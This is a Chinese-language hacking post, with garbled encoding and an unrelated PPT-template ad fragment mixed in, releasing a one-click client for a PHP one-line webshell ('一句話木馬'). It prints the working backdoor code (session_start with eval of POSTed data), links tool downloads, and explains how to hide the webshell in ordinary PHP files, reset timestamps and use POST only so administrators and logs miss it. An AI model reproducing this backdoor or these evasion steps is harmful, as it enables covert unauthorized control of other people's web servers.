零魂P(guān)HP一句話木馬客戶端(一鍵提交版)

《后會(huì)無期》電影海報(bào)PPT設(shè)計(jì)教程模板

• 類型：商務(wù)模板大�。�5.0M語言：中文 評(píng)分：10.0
• 標(biāo)簽：

立即下載

-----------------------------
1.修補(bǔ)了下原始版本有些服務(wù)器不能正常運(yùn)行的大Bug。
2.去掉了提交后的登陸密碼驗(yàn)證，提交后直接進(jìn)入大馬界面。
-----------------------------
更新說明:
-----------------------------
這玩意本來就是為了方便自己做的，所以本來只打算對(duì)自己負(fù)責(zé)，呵呵。好馬好工具如果傳出來必然被傳爛掉，但這東西無所謂，又不是多特別的東西，但有時(shí)候用著比較方便，所以發(fā)出來也無妨。

但是發(fā)出來后有朋友告訴我有些服務(wù)器上運(yùn)行沒成功，心里頓覺愧疚，發(fā)個(gè)小東西出來，結(jié)果功能還有問題，豈不是欺騙大眾。但是一直在忙，除了當(dāng)時(shí)做的 時(shí)候之外，幾乎再?zèng)]去測(cè)試過。昨晚hiphop兄給我說他那有臺(tái)服務(wù)器用不起，本來打算讓他發(fā)Shell來我正好測(cè)試下具體原因，結(jié)果他說他已經(jīng)測(cè)試了并 告訴是magic_quotes_gpc的原因(是個(gè)低級(jí)錯(cuò)誤...)，得謝謝他。
然后花了個(gè)把小時(shí)詳細(xì)測(cè)試并修改了下

相關(guān)關(guān)鍵代碼:

session_start();$_SESSION[chr(99)]=get_magic_quotes_gpc()?stripslashes($_POST[chr(100)]):$_POST[chr(100)];eval($_SESSION[chr(99)]);
-----------------------------
現(xiàn)在的版本magic_quotes_gpc On和Off都測(cè)試OK，不過不知道還有沒有其它會(huì)造成不正常的因素，實(shí)在懶的自己去一個(gè)一個(gè)測(cè)試了，等遇到了再說吧，也歡迎大家反饋。
-----------------------------
下載:
http://evilwares.appspot.com/down/zerosoul_PHP_eval_Client_v0.2.rar

在線使用:
http://evilwares.appspot.com/static/eval.html
--------------------
前天通宵到后半夜的時(shí)候，總覺得自己最近都沒干什么實(shí)事，覺得有點(diǎn)虛度的味道，心中不免有些自責(zé)。為了寬慰自己，決定做點(diǎn)正事。然后就啥都沒干，坐著干想該做什么。一直想到快天亮，總算想出點(diǎn)東西來了(- -!)，也就是現(xiàn)在發(fā)布的這個(gè)東西。
海洋頂端有個(gè)一鍵提交版的ASP一句話客戶端，很方便，一次提交之后，一句話就可以當(dāng)大馬用了。用這種客戶端的話，留一句話的shell也就麻煩不到哪去了，而且把一句話藏在正常文件里面，再把時(shí)間改回正常，訪問只用POST的話，基本是很難發(fā)現(xiàn)的。
但是PHP一句話一直沒有見這樣的客戶端(不知道是不是我孤弱寡聞)，網(wǎng)上居然還有轉(zhuǎn)載的到處都是的工具，結(jié)果下載下來不能用.....
比較喜歡一句話的一鍵提交這種形式，所以花了2 x 半個(gè)通宵的時(shí)間做了這個(gè)東西，思路參考的是海洋，客戶端的CSS也是修改它的，呵呵。
注意:
由于一鍵提交版的特殊性，暫時(shí)是不能隨心所欲的換密碼的，這個(gè)客戶端的密碼是字母c。(海洋的也是這樣)。這個(gè)問題并不是不能解決，但是比較麻煩，所以還不如就用這密碼呢，呵呵。
特點(diǎn):
1.填好一句話WebShell地址和密碼并點(diǎn)提交之后，后續(xù)操作不用再依賴客戶端，基本上剩下的和操作大馬沒什么兩樣。
2.完全POST提交，避免了WebServer記錄敏感數(shù)據(jù)。如果一句話插在有正常用戶訪問的PHP文件的話，插完時(shí)間也改回來了，那么管理員發(fā)現(xiàn)的概率就相當(dāng)?shù)土恕?海洋的不是全POST)
大概原理:
一鍵提交版的一句話客戶端連接成功之后，每次POST數(shù)據(jù)的時(shí)候, 假設(shè)一句話密碼是c，都要先讓本地表單:
c = session_start();eval($_SESSION[chr(120)]);
chr(120)就是字母c，為了避免單引號(hào)寫成chr(120)形式。
然后一句話在eval($_POST[c])的時(shí)候，才能執(zhí)行保存在Session中的我們的PHP代碼。
想用其它密碼的朋友可以依據(jù)這個(gè)原理修改。
下載:
http://evilwares.appspot.com/down/zerosoul_PHP_eval_Client.rar